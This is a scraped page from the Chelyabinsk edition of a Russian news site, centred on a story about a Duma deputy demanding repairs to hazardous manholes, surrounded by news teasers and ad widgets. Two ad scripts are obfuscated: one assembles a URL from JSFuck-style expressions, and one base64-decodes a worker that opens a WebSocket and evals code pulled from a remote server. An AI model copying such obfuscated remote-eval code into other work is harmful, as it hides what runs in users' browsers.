													8&nbsp;октября&nbsp;2018,&nbsp;13:23																			[&nbsp;«Аргументы Недели. Челябинск»&nbsp;]
						
					</span>
				</p>
				<div class="publtxt">
																		<figure id="publ_photo">
																<img src="http://argumenti.ru/images/preview/arhnews/cebd258af14d8093dbe53e8513b2c6e4.jpg" alt="Бурматов дал срок до конца недели устранить аварийные люки" />
																							</figure>
											

																	
																								
						<div class="js-mediator-article" style="display: inline-block;"><p><strong>Люки и ливневки стали настоящими ловушками для автомобилистов в Челябинске. Дело в том,что после ремонта центральных улиц люки стали выше на несколько сантиметров,а ливневки - ниже. Либо лавировать, либо портить подвеску. Автомобилисты пожаловались депутату Госдумы Владимиру Бурматову, и он потребовал до конца недели устранить недоделки.</strong></p>
<p>Напомним,что подобная ситуация уже происходила на проспекте Ленина.Тогда дорожники оставили люки вообще открытыми, и машины регулярно оставляли в них колеса и подвеску. Пластиковые ограждения регулярно "испарялись", и необходимобыло принимать срочное решение. После вмешательства парламентария люки восстановили втечение 4 дней, а не через полтора месяца, как обещали ранее.</p>
<p>В этот раз улицы Воровского и Блюхера будут доделаны до конца текущей недели. такое задание дал дорожникам Владимир Бурматов по поручению главы региона Бориса Дубровского.</p></div>

						
							<p class="ai_youtube">
			<a href="http://argumenti.ru/ad_informer/click/81102?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Воспитатель тигров Михаил Зарецкий (Документальный фильм)</a>
	</p>
						
						<div class="paywall_box">
    <div> 
        <h3>Понравилась публикация? Поддержите издание!</h3>
        <a class="button" href="http://argumenti.ru/robomail/688">5 руб. [ Сказать спасибо ]</a>
        <a class="button podpiska_button" style="float: left;" href="http://argumenti.ru/robomail/712" role="button">25 руб. [ Получить свежий номер на почту ]</a>
        <a class="button podpiska_button" style="float: right;" href="http://argumenti.ru/robomail/486" role="button">490 руб. [ Получить годовую подписку ]</a>      
        <p class="snoska">*Получай яркий, цветной оригинал газеты в формате PDF на свой электронный адрес</p>
        
        <h4 style="padding-top: 9px;">Оставайтесь с нами. <span style="text-decoration: underline;">Добавьте нас в "Мои источники" в Яндекс Новостях</span> и мы позаботимся о том, чтобы вы читали только интересный и проверенный контент</h4>          
        <a class="button" style="background: #343a40;margin-top: 5px;" href="https://goo.gl/3NxAWJ" target="_blank">Добавить в «Мои Источники» в Яндекс Новостях</a>


        <h4>Обсудить наши публикации можно здесь:</h4>
		
		<div class="paywall_socnets">
			<a href="https://vk.com/club14409962">
				<i class="fa fa-vk" aria-hidden="true"></i>
			</a>
			<a href="https://ok.ru/argumenti">
				<i class="fa fa-odnoklassniki" aria-hidden="true"></i>
			</a>
			<a href="https://www.facebook.com/argumentinedeli">
				<i class="fa fa-facebook" aria-hidden="true"></i>
			</a>
			<a href="https://twitter.com/argumenti">
				<i class="fa fa-twitter" aria-hidden="true"></i>
			</a>
			<a href="https://www.instagram.com/argumenti.ru/">
				<i class="fa fa-instagram" aria-hidden="true"></i>
			</a>
		</div>

    </div>
</div>
								
						

				</div>
	
			</article>

												<div id="initials">БЛ</div>
					

			<ul id="tags"><li>Теги:&nbsp;</li>
									<li>				<a href="http://argumenti.ru/search/%23%D0%A7%D0%B5%D0%BB%D1%8F%D0%B1%D0%B8%D0%BD%D1%81%D0%BA">Челябинск</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23%D0%91%D1%83%D1%80%D0%BC%D0%B0%D1%82%D0%BE%D0%B2">Бурматов</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23%D1%80%D0%B5%D0%BC%D0%BE%D0%BD%D1%82%2B%D0%B4%D0%BE%D1%80%D0%BE%D0%B3">ремонт дорог</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23%D0%B3%D1%83%D0%B1%D0%B5%D1%80%D0%BD%D0%B0%D1%82%D0%BE%D1%80">губернатор</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23%D0%94%D1%83%D0%B1%D1%80%D0%BE%D0%B2%D1%81%D0%BA%D0%B8%D0%B9">Дубровский</a>
			</li>
					</ul>
	

			
		

	    
<!--<p id="comment_info">Обсудить наши публикации можно на страничках «АН» в <a href="http://facebook.com/argumentinedeli" target="_blank" rel="nofollow">Facebook</a> и <a href="http://vk.com/club14409962" target="_blank" rel="nofollow">ВКонтакте</a></p>-->

<script type="text/javascript">(function() {
  if (window.pluso)if (typeof window.pluso.start == "function") return;
  if (window.ifpluso==undefined) { window.ifpluso = 1;
    var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
    s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://share.pluso.ru/pluso-like.js';
    var h=d[g]('body')[0];
    h.appendChild(s);
  }})();</script>
<div class="pluso" data-background="none;" data-options="medium,square,line,horizontal,counter,sepcounter=1,theme=14" data-services="vkontakte,odnoklassniki,facebook,twitter,moimir"></div>
    
        <!-- Yandex.RTB R-A-50615-11 -->
<div id="yandex_rtb_R-A-50615-11"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-11",
                renderTo: "yandex_rtb_R-A-50615-11",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<p class="namerub"><span class="rem">//</span>Подписаться на рассылку эксклюзива от АН</p>
	<noindex>
		<iframe src="http://mailing.argumenti.ru/" style="width:97%; border: none;padding: 0px;">
	    	Ваш браузер не поддерживает плавающие фреймы!
		 </iframe>
	 </noindex>
    
        
    <div id="utCRoll"></div> 
                <script> 
                    (function (w, d, u) { 
                        w.utCRoll = { 
                            id: 2352, max_prerolls:1, 
                        onClose: function () { //действия по закрытию плеера  
                        } 
                        }; 
                        var s=d.createElement("script");s.type='text/javascript';s.charset="UTF-8";s.async=true;s.src=u;d.head.appendChild(s); 
                    }) 
                    (window, document, "https://ima.utraff.com/new/contentroll.js"); 
                </script>			<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/588254"><img src="http://argumenti.ru/images/preview/arhnews/e6c3c3caf944bf27045aee07ab5cca1c.jpg" alt="Борис Дубровский сохранит льготы и пособия пенсионерам" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/588254">Борис Дубровский сохранит льготы и пособия пенсионерам</a>
							<span class="rub_time">14:48</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/588254">Благодаря успешной экономической политике на Южном Урале есть средства для того, чтобы в полной мере сохранить все ключевые льготы и пособия для людей старшего возраста. Кроме того, выплата вырастет до 700 рублей. Такое решение принял глава региона Борис Дубровский.

 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/588252"><img src="http://argumenti.ru/images/preview/arhnews/49eaf883c3a65bb7991006229c836ab7.jpg" alt="Борис Дубровский предложил снизить транспортный налог в 50 раз" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/588252">Борис Дубровский предложил снизить транспортный налог в 50 раз</a>
							<span class="rub_time">14:39</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/588252">Существенные послабления в налоговых выплатах получат люди пенсионного возраста. С соответствующей инициативой он обратился к депутатам регионального ЗСО.


 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/588235"><img src="http://argumenti.ru/images/preview/arhnews/8a3b08bf1165fd0e869848117b7c8fd8.jpg" alt="Выиграй приставку для цифрового ТВ от газеты &laquo;Губерния&raquo;" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/588235">Выиграй приставку для цифрового ТВ от газеты &laquo;Губерния&raquo;</a>
							<span class="rub_time">13:29</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/588235">С 10 января 2019 года государство перестанет субсидировать распространение аналогового телевизионного сигнала в городах и поселках с населением менее ста тысяч человек. Но все эти каналы можно будет смотреть по бесплатному цифровому телевидению. Для этого к телевизорам старого образца потребуется установить цифровую приставку. <strong>>></strong>
		</a>
	</div>
</div>

		<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: Аргументы Недели (центральная колонка)-->
<!--Расположение: <верх страницы>-->
<div id="adfox_15208558234369660"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_15208558234369660',
        params: {
            pp: 'g',
            ps: 'cquo',
            p2: 'fvjc'
        }
    });
</script>																		
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/588233"><img src="http://argumenti.ru/images/preview/arhnews/b690b51ecf34d17fd3c0e90715b562a1.jpg" alt="Бурматов дал срок до конца недели устранить аварийные люки" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/588233">Бурматов дал срок до конца недели устранить аварийные люки</a>
							<span class="rub_time">13:23</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/588233">Люки и ливневки стали настоящими ловушками для автомобилистов в Челябинске. Дело в том, что после ремонта центральных улиц люки стали выше на несколько сантиметров, а ливневки - ниже. Либо лавировать, либо портить подвеску. Автомобилисты пожаловались депутату Госдумы Владимиру Бурматову <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/588229"><img src="http://argumenti.ru/images/preview/arhnews/091bef735dd309922d17c3d20d8d0e97.jpg" alt="Книга о &laquo;Вечернем Челябинске&raquo; расскажет про 50-летнюю историю газеты" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/588229">Книга о &laquo;Вечернем Челябинске&raquo; расскажет про 50-летнюю историю газеты</a>
							<span class="rub_time">12:52</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/588229">В этом году газета «Вечерний Челябинск» отметит свой 50-летний юбилей. К этой знаменательной дате в южноуральской столице будет выпущена книга «50 лет вместе с городом», которая расскажет об истории газеты от первых лет становления до современности.

 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/588191"><img src="http://argumenti.ru/images/preview/arhnews/9ce571f400202dfe5fdc5f31c4c5080a.jpeg" alt="У Tele2 вырос в семь раз международный интернет-роуминг" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/588191">У Tele2 вырос в семь раз международный интернет-роуминг</a>
							<span class="rub_time">08:17</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/588191">Только за три месяца лета клиенты оператора сотовой связи Tele2 на Урале скачали в роуминге из-за границы в семь раз больше информации, чем обычно. Это получилось благодаря росту географии стран для безлимитного интернета.
 <strong>>></strong>
		</a>
	</div>
</div>

				<h2 class="namerub"><span class="rem">//</span>Новости МирТесен</h2>
<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>

<br><br>																
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/education/2018/10/588012"><img src="http://argumenti.ru/images/preview/arhnews/7e2787bbdeb35ce0c1be44fe641a035b.jpg" alt="В Чурилово достроят новую современную школу" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/education/2018/10/588012">В Чурилово достроят новую современную школу</a>
							<span class="rub_time">05.10&nbsp;14:33</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/education/2018/10/588012">Новую школу для жителей микрорайона Чурилово в Челябинске достроят к началу следующего учебного года. Такое требование выдвинул депутат госдумы Владимир Бурматов в ходе посещения строящегося здания. Кроме того, он помог ученикам быстрее добираться до местной школы — сейчас их будет собирать школьный автобус.
 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/education/2018/10/588006"><img src="http://argumenti.ru/images/preview/arhnews/d737020c9f009b66d0bc69f71c622565.jpg" alt="Анатолий Литовченко поздравил педагогов" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/education/2018/10/588006">Анатолий Литовченко поздравил педагогов</a>
							<span class="rub_time">05.10&nbsp;13:29</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/education/2018/10/588006">Депутат Госдумы Анатолий Литовченко от всей души поздравил работников сферы образования с профессиональным праздником. Он заявил, что быть преподавателем — это дар, и настоящий педагог всегда дает больше, чем заложено в программе обучения.
 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587988"><img src="" alt="Единороги в Челябинской области" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587988">Единороги в Челябинской области</a>
							<span class="rub_time">05.10&nbsp;10:14</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587988">Современная тенденция такова, что детские праздники обходятся порой не дешевле, чем взрослые. Угощение, украшения – на все это тратится немало денег, но на организации праздника вполне можно сэкономить, при этом нисколько не потеряв в качестве! Так, купить всю атрибутику для детского праздника вы сможете в магазине постоянных распродаж «Галамарт» - цены в нем вас приятно удивят.  <strong>>></strong>
		</a>
	</div>
</div>

						<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<div id="gnezdo_ru_14115" style="display:block !important">Загрузка...</div>
<script type="text/javascript">
window.CD = 'h'+(!![]+[])[(+[])]+(!![]+[])[(+[])]+(RegExp().constructor.name)[((+!+[])+(+!+[]))+(+!+[]+((+!+[])+(+!+[])))]+`:`+`/`+`/`+(typeof [])[((+!+[])+(+!+[]))*((+!+[])+(+!+[]))]+([]+[]+[][[]])[((+!+[])+(+!+[]))]+([]+[]+[][[]])[(+!+[])]+`.`+([]+[]+[][[]])[(+!+[])]+([]+[]+[][[]])[(+!+[]+((+!+[])+(+!+[])))]+(!![]+[])[(+[])]+`.`+(!![]+[])[(+!+[])]+(!![]+[])[((+!+[])+(+!+[]))]+`/`+(typeof [])[((+!+[])+(+!+[]))*((+!+[])+(+!+[]))]+(typeof ![])[(+!+[])]+([]+[]+[][[]])[(+!+[])]+(![]+[])[(+[])]+([]+[]+[][[]])[(+[+!+[]+[+[]]])/((+!+[])+(+!+[]))]+(typeof ([]+[]))[(+[+!+[]+[+[]]])/((+!+[])+(+!+[]))]+`.`+(typeof [])[((+!+[])+(+!+[]))]+(![]+[])[(+!+[]+((+!+[])+(+!+[])))];

function conf(n){window.GNEZDO_CONF=n,window.GNEZDO_CB&&window.GNEZDO_CB()}var sc;(sc=function(n,o){var e=document.createElement("script");e.type="text/javascript",o||(e.onerror=function(n){var o=this;window.GNEZDO_CONF?sc(window.GNEZDO_CONF.d+encodeURIComponent(o.src),1):(window.GNEZDO_CB=function(){sc(window.GNEZDO_CONF.d+encodeURIComponent(o.src),1)},sc(window.CD,1))}),e.async=!0,e.src=n,e.charset="windows-1251",f=function(){document.getElementsByTagName("head")[0].appendChild(e)},"[object Opera]"==window.opera?document.addEventListener("DOMContentLoaded",f):f()})("//news.gnezdo.ru/show/14115/block_a.js");
</script>														
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/education/2018/10/587941"><img src="http://argumenti.ru/images/preview/arhnews/28babbd9a7bdb131346c75652ad905e9.jpg" alt="РМК открыла в Кыштыме лабораторию будущих инженеров" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/education/2018/10/587941">РМК открыла в Кыштыме лабораторию будущих инженеров</a>
							<span class="rub_time">04.10&nbsp;16:04</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/education/2018/10/587941">Благодаря победе в конкурсе Русской медной компании "Измени свой город к лучшему" в Центре технического творчества появился новехонький 3D-сканер, станок с числовым программным управлением и детали для строительства робототехники. На них будут заниматься порядка 400 ребят ежегодно возрастом от 13 лет. Сумма гранта составила 250 тысяч рублей. <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587936"><img src="http://argumenti.ru/images/preview/arhnews/5262b44878b09d61253b12b83593913a.jpg" alt="Глава Металлургического района поздравил педагогов с днем учителя" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587936">Глава Металлургического района поздравил педагогов с днем учителя</a>
							<span class="rub_time">04.10&nbsp;15:29</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587936">Уважаемые учителя, преподаватели, педагоги дошкольного и дополнительного образования, ветераны педагогического труда!
 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/culture/2018/10/587934"><img src="http://argumenti.ru/images/preview/arhnews/fab48fe82a5fe9295df7ab1ed7a61c24.jpg" alt="&laquo;Вечерка&raquo; и главное литературное событие 2018 года на Южном Урале" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/culture/2018/10/587934">&laquo;Вечерка&raquo; и главное литературное событие 2018 года на Южном Урале</a>
							<span class="rub_time">04.10&nbsp;15:26</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/culture/2018/10/587934">5 и 6 октября в челябинской Публичке пройдет традиционная Южноуральская книжная ярмарка — территория общения участников большого литературного процесса. Запланировано более 40 мероприятий с участием писателей, издателей, книготорговцев, читателей и библиотекарей, главная цель которых — продвигать книгу как источник идей развития общества.
 <strong>>></strong>
		</a>
	</div>
</div>

								<h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>

<script id="r19412" type="text/javascript">
    (function() {
        var worker19412,
            tickerID = 19412,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/19/ticker_19412.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker19412.postMessage(data);
                }

                worker19412 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker19412.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker19412.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
												
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587888"><img src="http://argumenti.ru/images/preview/arhnews/35c95878488bc2e38c2ff7ff0b2f7fac.jpg" alt="Бурматов и Цуканов обсудили экологию Южного Урала" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587888">Бурматов и Цуканов обсудили экологию Южного Урала</a>
							<span class="rub_time">04.10&nbsp;10:54</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587888">депутат Госдумы Владимир Бурматов встретился с полпредом президента России Николаем Цукановым,чтобы обсудить проблемы экологии Южного Урала и наметить ноябрьскую встречу промышленников, глав регионов и представителей исполнительной власти, которая пройдет в Екатеринбурге и Челябинске.
 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587874"><img src="http://argumenti.ru/images/preview/arhnews/5a7a391190e67e85ff277bfa4b0dd9e6.jpg" alt="В Челябинске установят три тысячи новых контейнеров для мусора" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587874">В Челябинске установят три тысячи новых контейнеров для мусора</a>
							<span class="rub_time">04.10&nbsp;09:43</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587874">Прямо сейчас в Челябинске началась сборка новых, более вместительных контейнеров для бытового мусора. Они частично заменят баки в Тракторозаводском и Калининском районах Челябинска. Всего ожидается установка порядка трех тысяч новых емкостей.

 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587783"><img src="http://argumenti.ru/images/preview/arhnews/d16bc63fb7f2ffe06cc521fd17bc198d.png" alt="На Южном Урале начались масштабные учения энергетиков" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587783">На Южном Урале начались масштабные учения энергетиков</a>
							<span class="rub_time">03.10&nbsp;15:03</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587783">На учебно-тренировочном полигоне филиала ОАО «МРСК Урала» - «Челябэнерго» в Красноармейском районе Южного Урала начались  командно-штабные учения. Эксперты проверят готовность энергетиков ОАО «МРСК Урала» к ликвидации аварийных ситуаций и предупреждению массовых отключений энергетических объектов, которые вызваны опасными природными явлениями. <strong>>></strong>
		</a>
	</div>
</div>

										<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10213">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/4/c/10213.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
										
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587779"><img src="http://argumenti.ru/images/preview/arhnews/c43b490cac1e0d94cefdde422cf51bb4.jpg" alt="Минэкологии Южного Урала проследит за каждым контейнером для мусора" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587779">Минэкологии Южного Урала проследит за каждым контейнером для мусора</a>
							<span class="rub_time">03.10&nbsp;14:55</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587779">Если в вашем дворе не хватает контейнеров для бытового мусора или площадка до сих пор заполнена отходами – звоните.


 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587772"><img src="http://argumenti.ru/images/preview/arhnews/675bb309058c4cfbc56f57530bb62165.png" alt="Две недели бесплатного теста безлимита на интернет предлагает Tele2" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587772">Две недели бесплатного теста безлимита на интернет предлагает Tele2</a>
							<span class="rub_time">03.10&nbsp;13:56</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587772">Хотите протестировать бесплатный безлимит на интернет и связь внутри сети? Компания Tele2 запускает двухнедельный тест-драйв нового тарифа «Мой безлимит». Если понравится - останетесь.

 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/education/2018/10/587743"><img src="http://argumenti.ru/images/preview/arhnews/585545e56a51540757c1168933c82b51.JPG" alt="В столице Южного Урала прошел евразийский форум" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/education/2018/10/587743">В столице Южного Урала прошел евразийский форум</a>
							<span class="rub_time">03.10&nbsp;07:48</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/education/2018/10/587743">27 сентября в Челябинске состоялся международный молодежный форум «Евразийская интеграция – выбор молодых», в котором приняли участие представители Казахстана и Таджикистана.

 <strong>>></strong>
		</a>
	</div>
</div>

												<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: Аргументы Недели (центральная колонка)-->
<!--Расположение: <середина страницы>-->
<div id="adfox_151990176341747532"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_151990176341747532',
        params: {
            pp: 'h',
            ps: 'cquo',
            p2: 'fvjc'
        }
    });
</script>								
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/culture/2018/10/587742"><img src="http://argumenti.ru/images/preview/arhnews/1a39e8c9b646baadbb6d3a626a976190.jpg" alt="7 октября в Челябинске состоится шоу &laquo;DIVA&raquo; от Ани Лорак" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/culture/2018/10/587742">7 октября в Челябинске состоится шоу &laquo;DIVA&raquo; от Ани Лорак</a>
							<span class="rub_time">03.10&nbsp;07:45</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/culture/2018/10/587742">7 октября в ДС "Юность", в  19:00 дива Ани Лорак представит шоу, которого еще не было в истории нашего шоу-бизнеса. В программе прозвучат признанные хиты  в смелых аранжировках: «Зеркала», «Обними меня», «Сопрано», «Сумасшедшая», «Ты еще любишь», «Забирай рай» и другие. 
 <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/society/2018/10/587706"><img src="http://argumenti.ru/images/preview/arhnews/666c3d7e55720931a91caf623679fa7c.jpg" alt="Борис Дубровский: Ситуация с вывозом отходов в Челябинске преломлена" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/society/2018/10/587706">Борис Дубровский: Ситуация с вывозом отходов в Челябинске преломлена</a>
							<span class="rub_time">02.10&nbsp;16:36</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/society/2018/10/587706">Борис Дубровский лично проконтролировал качество уборки контейнерных площадок Курчатовского и Калининского района - именно по ним в правительство региона поступило максимальное количество жалоб. Итогом проверки стало совещание, на котором глава региона распорядился выделить дополнительные 20 миллионов рублей <strong>>></strong>
		</a>
	</div>
</div>

																				
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/sport/2018/10/587701"><img src="http://argumenti.ru/images/preview/arhnews/ca3618b3c99c29ca8f7ff2a324c0bb50.jpg" alt="В Екатеринбурге состоится международная туристская  выставка &laquo;Expotravel 2018&raquo;" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/sport/2018/10/587701">В Екатеринбурге состоится международная туристская  выставка &laquo;Expotravel 2018&raquo;</a>
							<span class="rub_time">02.10&nbsp;15:57</span></p>
				
	<div class="maxianons">
		<a href="http://argumenti.ru/sport/2018/10/587701">Она состоится 5 и 6 октября на площадке Президентского Центра Бориса Ельцина (Бориса Ельцина, 3). В рамках выставки запланировано более 40 интересных деловых мероприятий: 

 <strong>>></strong>
		</a>
	</div>
</div>

														
<p class="namerub"><span class="rem">//</span>Новости партнеров</p>
<div id="smi_teaser_3101">
    <center><a href="http://24smi.info" rel="nofollow">Агрегатор новостей 24СМИ</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
                (function() {
                var sm = document.createElement("script");
                sm.type = "text/javascript";
                sm.async = true;
                sm.src = "//jsn.24smi.net/6/2/3101.js";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(sm, s);})();</script>
            
<hr>						
			
				<div class="mainrub">
				
			<a href="http://argumenti.ru/economics/2018/10/587686"><img src="http://argumenti.ru/images/preview/arhnews/a33c8ea584a58135916f8802a2eca417.jpg" alt="Южный Урал ждет дополнительные средства федерального бюджета" /></a>
					
		<p class="maxititle">
			<a href="http://argumenti.ru/economics/2018/10/587686">Южный Урал ждет дополнительные средства федерального бюджета</a>
							<span class="rub_time">02.10&nbsp;13:03</span></p>
				
	<div class="maxianons">
